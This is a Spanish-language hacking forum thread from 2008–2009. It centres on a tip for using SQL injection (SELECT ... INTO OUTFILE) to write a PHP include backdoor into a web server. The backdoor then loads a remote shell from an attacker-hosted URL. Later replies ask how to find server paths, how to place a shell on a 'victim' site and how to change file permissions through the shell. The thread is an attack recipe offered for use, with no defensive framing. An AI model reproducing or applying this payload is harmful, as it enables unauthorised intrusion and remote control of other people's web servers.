Consulta SQL para crear archivo que permita RFI

DragoN · 03-Oct-2008, 18:17

Este es un pequeño tip muy sencillo pero siempre útil, cuando es posible realizar SQL injection en un sistema podremos crear un archivo que permita la inyección de ficheros remotos (una shell en php por ejemplo) haciendo uso de un 'Union Select' de la siguiente forma.

Código:

SELECT '<?php include($_GET[$f]); ?>'
INTO OUTFILE 'c:\\RUTASERVIDOR\\www\\archivo.php'

en RUTASERVIDOR debemos colocar la ruta en la que se encuentra nuestro servidor web (si no la conocemos podremos generar un error en la aplicación para intentar obtenerla) y archivo.php es el fichero que se crea con la cadena '<?php include($_GET[$f]); ?>' dentro de el.

Después de esto solo debemos llamar el "archivo.php" de la siguiente forma archivo.php?abrir=http://RUTADESHELL/shell.txt y listo.

luisascoobydoo · 11-Dec-2008, 18:27

hola,
buscando en la web encontre algo sobre shell pero no estoy segura de que hacer, acerca de lo que me dices alli, si me puedieses colaborar gracias,
luisascoobydoo@gmail.com
LSD

Hyard · 08-Jan-2009, 04:18

El objetivo es crear un php, en este caso "archivo.php", en un sitio web, pero para ejecutar la consulta se debe saber la ruta del servidor, ??? , como la obtengo?

DragoN, nose si estoy mal, pero el archivo que se crea en el sitio de la victima, "arvhivo.php", es vacio!!!

La idea es subir, como dices, po ejemplo una shell, pero pues la creo , Y? como la subo?

La unica forma que se me ocurre es con paginas vulnerables a rfi, teniendo mi shell en otro host de la siguiente manera:
http://www.sitio_victima.com/index.p...r/mi_shell.php
pero en este caso sobraria la consulta.

O en la consulta en "RUTASERVIDOR" es mi servidor, y pues inyecto la consulta en algun form de una pagina? algo asi como un ftp al ese sitio pero sin autorizacion XD?

Sea como sea, si pequeño tip, pero muy bueno, gracias DragoN ;D

Creo que estoy un poco confundido ??? help me pls!!!

Hyard · 08-Jan-2009, 04:26

Ahhh se me olvido, por medio de la shell hay forma de modificar los permisos o atributos de los ficheros del sitio?

PerverthsO · 08-Jan-2009, 15:14

depende de los privilegios q tengas para poder hacer esas cosas

Jocabek · 07-Feb-2009, 10:19

Hola amigos de la comunidad deseo que alquien me ayude a resolver un problema urgente que tengo es sobre como poder borrar algunas cosillas que me afectan.